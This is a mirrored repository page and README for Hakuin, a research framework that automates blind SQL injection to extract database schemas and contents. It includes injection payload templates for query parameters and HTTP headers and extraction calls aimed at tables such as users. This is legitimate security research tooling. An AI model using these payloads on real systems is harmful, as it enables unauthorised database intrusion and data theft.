hakuin

mirror of https://github.com/pruzko/hakuin synced 2024-09-16 20:31:33 +02:00

A blazing fast Blind SQL Injection optimization and automation framework. https://github.com/pruzko/hakuin

Go to file

Jakub Pruzinec dc0bc22682 integer columns extraction, readme update, logo background		2023-10-29 17:05:38 +08:00
hakuin	integer columns extraction, readme update, logo background	2023-10-29 17:05:38 +08:00
publications	publications and readme	2023-09-03 15:22:35 +08:00
tests	integer columns extraction, readme update, logo background	2023-10-29 17:05:38 +08:00
.gitignore	major refactoring (DBMS, collectors) & unicode support	2023-10-04 19:13:22 +08:00
LICENSE	license	2023-09-05 16:11:33 +08:00
logo.png	integer columns extraction, readme update, logo background	2023-10-29 17:05:38 +08:00
pyproject.toml	version update	2023-10-04 19:15:15 +08:00
README.md	integer columns extraction, readme update, logo background	2023-10-29 17:05:38 +08:00

README.md

Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstract away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin uses pre-trained language models for DB schemas and adaptive language models in combination with opportunistic string guessing for textual DB content.

Hakuin has been presented at esteemed academic and industrial conferences:

BlackHat MEA, Riyadh, 2023
Hack in the Box, Phuket, 2023
IEEE S&P Workshop on Offsensive Technology (WOOT), 2023

More information can be found in our paper and slides.

Installation

To install Hakuin, simply run:

pip3 install hakuin

Developers should install the package locally and set the -e flag for editable mode:

git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip3 install -e .

Examples

Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester and override the request method. Also, the method must determine whether the query resolved to True or False.

Example 1 - Query Parameter Injection with Status-based Inference

import requests
from hakuin import Requester

class StatusRequester(Requester):
    def request(self, ctx, query):
        r = requests.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
        return r.status_code == 200

Example 2 - Header Injection with Content-based Inference

class ContentRequester(Requester):
    def request(self, ctx, query):
        headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
        r = requests.get(f'http://vuln.com/', headers=headers)
        return 'found' in r.content.decode()

To start extracting data, use the Extractor class. It requires a DBMS object to contruct queries and a Requester object to inject them. Currently, Hakuin supports SQLite and MySQL DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

Example 1 - Extracting SQLite DBs

from hakuin.dbms import SQLite
from hakuin import Extractor, Requester

class StatusRequester(Requester):
    ...

ext = Extractor(requester=StatusRequester(), dbms=SQLite())

Example 2 - Extracting MySQL DBs

from hakuin.dbms import MySQL
...
ext = Extractor(requester=StatusRequester(), dbms=MySQL())

Now that eveything is set, you can start extracting DB schemas.

Example 1 - Extracting DB Schemas

# strategy:
#   'binary':   Use binary search
#   'model':    Use pre-trained models
schema = ext.extract_schema(strategy='model')

Example 2 - Extracting DB Schemas with Metadata

# metadata:
#   True:   Detect column settings (data type, nullable, primary key)
#   False:  Pass
schema = ext.extract_schema(strategy='model', metadata=True)

Example 3 - Extracting only Table/Column Names

tables = ext.extract_table_names(strategy='model')
columns = ext.extract_column_names(table='users', strategy='model')

Once you know the schema, you can extract the actual content.

Example 1 - Extracting Textual Columns

# strategy:
#   'binary':       Use binary search
#   'fivegram':     Use five-gram model
#   'unigram':      Use unigram model
#   'dynamic':      Dynamically identify the best strategy. This setting
#                   also enables opportunistic guessing.
res = ext.extract_column_text(table='users', column='address', strategy='dynamic'):

Example 2 - Extracting Integer Columns

res = ext.extract_column_int(table='users', column='id'):

More examples can be found in the tests directory.

For Researchers

This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

Cite Hakuin

@inproceedings{hakuin_bsqli,
  title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
  author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
  booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
  pages={384--393},
  year={2023},
  organization={IEEE}
}